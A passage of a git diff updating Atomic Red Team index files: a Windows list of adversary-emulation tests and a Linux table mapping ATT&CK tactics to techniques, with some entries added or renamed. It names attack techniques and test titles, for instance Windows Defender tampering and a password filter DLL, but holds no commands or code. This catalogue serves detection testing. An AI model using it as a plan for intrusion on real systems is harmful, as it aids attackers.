[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1027.004 Compile After Delivery](../../T1027.004/T1027.004.md) - Atomic Test #1: Compile After Delivery using csc.exe [windows] - Atomic Test #2: Dynamic C# Compile [windows] @@ -369,6 +379,8 @@ - Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -384,7 +396,7 @@ - Atomic Test #9: Delete Prefetch File [windows] - Atomic Test #10: Delete TeamViewer Log Files [windows] - T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md) - Atomic Test #3: Create Windows System File with Attrib [windows] @@ -425,6 +437,7 @@ - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows] - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows] - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md) - Atomic Test #1: Creating W32Time similar named service using schtasks [windows] - Atomic Test #2: Creating W32Time similar named service using sc [windows] @@ -596,6 +609,7 @@ - [T1098 Account Manipulation](../../T1098/T1098.md) - Atomic Test #1: Admin Account Manipulate [windows] - Atomic Test #2: Domain Account and Group Manipulate [windows] +- T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) @@ -642,6 +656,7 @@ - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows] - Atomic Test #3: Create a new Domain Account using PowerShell [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -661,6 +676,7 @@ - Atomic Test #1: Create local account with admin priviliges [windows] - [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) - Atomic Test #1: Logon Scripts [windows] +- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md) - Atomic Test #1: Netsh Helper DLL Registration [windows] - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -673,6 +689,8 @@ - [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md) - Atomic Test #1: Install Outlook Home Page Persistence [windows] - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md) + - Atomic Test #1: Install and Register Password Filter DLL [windows] - T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -817,6 +835,7 @@ - [T1083 File and Directory Discovery](../../T1083/T1083.md) - Atomic Test #1: File and Directory Discovery (cmd.exe) [windows] - Atomic Test #2: File and Directory Discovery (PowerShell) [windows] +- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1087.001 Local Account](../../T1087.001/T1087.001.md) - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows] - Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows] @@ -872,6 +891,7 @@ - Atomic Test #8: Windows MachineGUID Discovery [windows] - Atomic Test #9: Griffon Recon [windows] - Atomic Test #10: Environment variables discovery on windows [windows] +- T1614 System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) - Atomic Test #1: System Network Configuration Discovery on Windows [windows] - Atomic Test #2: List Windows Firewall Rules [windows] @@ -973,7 +993,7 @@ - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1059.007 JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1204.002 Malicious File](../../T1204.002/T1204.002.md) - Atomic Test #1: OSTap Style Macro Execution [windows] - Atomic Test #2: OSTap Payload Download [windows] diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index 1830c0ba..d4573090 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md @@ -1,46 +1,50 @@ # Linux Atomic Tests by ATT&CK Tactic & Technique | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| -| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | -| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | -| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Python](../../T1059.006/T1059.006.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Local Account](../../T1087.001/T1087.001.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | [Cron](../../T1053.003/T1053.003.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell](../../T1059.004/T1059.004.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | -| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | [File Deletion](../../T1070.004/T1070.004.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Trap](../../T1546.005/T1546.005.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | -| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | [Local Account](../../T1136.001/T1136.001.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | -| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | | -| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | ROMMONkit [CONTRIBUTE A 